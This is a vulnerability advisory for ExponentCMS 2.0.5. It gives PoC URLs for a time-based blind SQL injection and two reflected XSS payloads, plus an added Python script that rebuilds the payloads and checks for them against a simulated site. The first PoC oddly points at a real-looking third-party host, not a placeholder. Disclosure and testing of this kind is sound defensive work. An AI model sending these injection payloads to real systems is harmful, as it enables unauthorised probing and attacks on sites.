Information
--------------------
Name: XSS and Blind SQL Injection Vulnerabilities in ExponentCMS
Affected software: ExponentCMS 2.0.5 and possibly earlier versions.
Website: http://www.exponentcms.org
Vulnerability type: Cross-Site Scripting and SQL Injection
Severity: Critical
Researcher: Onur Yılmaz
Description
--------------------
Exponent is a website content management system (CMS) that allows
site owners to easily create and manage dynamic websites without
necessarily coding web pages directly or managing site navigation by hand.
Details
--------------------
Exponent CMS 2.0.5 contains a time-based blind SQL injection in the
"section" parameter and reflected cross-site scripting in the "tag" and
"src" parameters of index.php. The SQL injection PoC uses SLEEP(25), so a
vulnerable host answers roughly 25 seconds later than a baseline request;
the XSS PoCs close any open style/script context before injecting a script tag.
Example PoC URLs are as follows:
1) Blind SQL injection (time-based):
http://www.bkjia.com/index.php?section=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)
2) Reflected XSS in the "tag" parameter:
http://example.com/index.php?action=showall_by_tags&tag=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E&controller=news&src=Random4e5433b85bb1f
3) Reflected XSS in the "src" parameter:
http://example.com/index.php?controller=expTag&action=show&title=changes&src=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E
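The following script is an added example and is not part of the advisory or of the Exponent project. It rebuilds the PoC URLs from the raw payloads and implements the two checks a tester would run against a 2.0.5 install: a timing comparison for the SLEEP() probe and a search for the XSS payload reflected unescaped. The HTTP layer is injected as a function so the logic runs offline against a constructed fake site; the fake site's behaviour (echoing "tag"/"src" into the page, honouring SLEEP() in "section") is an assumption made for the demo, and the base URL http://example.com/index.php is a placeholder.

```python
import re
from html import escape
from urllib.parse import parse_qs, quote, urlencode, urlsplit

# Payloads as they appear in the advisory's PoC URLs, before URL-encoding.
SQLI_SLEEP = "(SELECT 1 FROM (SELECT SLEEP({n}))A)"
XSS = "'\"--></style></script><script>alert(1337)</script>"

BASE = "http://example.com/index.php"  # placeholder target (assumption)


def poc_urls(base=BASE, delay=25):
    """Rebuild the three PoC URLs from the raw payloads (order as in the advisory)."""
    sqli = quote(SQLI_SLEEP.format(n=delay), safe="()")
    xss_tag = urlencode({"action": "showall_by_tags", "tag": XSS,
                         "controller": "news", "src": ""})
    xss_src = urlencode({"controller": "expTag", "action": "show",
                         "title": "changes", "src": XSS})
    return [f"{base}?section={sqli}", f"{base}?{xss_tag}", f"{base}?{xss_src}"]


def time_based_sqli(timed_fetch, base=BASE, delay=5, threshold=None):
    """True when the SLEEP(delay) probe takes at least ~delay seconds longer
    than a harmless baseline request. timed_fetch(url) -> (body, seconds)."""
    _, baseline = timed_fetch(f"{base}?section=1")
    probe = f"{base}?section={quote(SQLI_SLEEP.format(n=delay), safe='()')}"
    _, elapsed = timed_fetch(probe)
    # Allow some jitter: 80% of the requested delay is still a clear signal.
    return elapsed - baseline >= (threshold if threshold is not None else delay * 0.8)


def reflected_xss(timed_fetch, url):
    """True when the raw (unescaped) XSS payload comes back in the response body."""
    body, _ = timed_fetch(url)
    return XSS in body


def make_fake_site(vulnerable):
    """Constructed stand-in for an Exponent instance (not real Exponent code):
    echoes the tag/src parameters into the page and, when `vulnerable`, adds
    SLEEP(n) seconds to the response time and skips output escaping."""
    def timed_fetch(url):
        qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
        seconds = 0.05  # simulated network baseline
        m = re.search(r"SLEEP\((\d+)\)", qs.get("section", [""])[0])
        if m and vulnerable:
            seconds += int(m.group(1))
        reflected = qs.get("tag", [""])[0] + qs.get("src", [""])[0]
        body = reflected if vulnerable else escape(reflected, quote=True)
        return f"<html><body>{body}</body></html>", seconds
    return timed_fetch


if __name__ == "__main__":
    for name, site in (("vulnerable", make_fake_site(True)), ("patched", make_fake_site(False))):
        urls = poc_urls()
        print(name, "sqli:", time_based_sqli(site), "xss:", reflected_xss(site, urls[1]))
```

To test a real installation, replace the fake `timed_fetch` with one that issues the request (for example with urllib) and returns the body together with the measured elapsed time; keep `delay` well above the host's normal response jitter, and repeat the probe to rule out a single slow response.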
You can read the full articles about Cross-Site Scripting and SQL
Injection vulnerabilities here:
http://www.mavitunasecurity.com/crosssite-scripting-xss/
http://www.mavitunasecurity.com/sql-injection/
Solution
--------------------
The developer has fixed these issues in the release following 2.0.5; upgrade to the current version.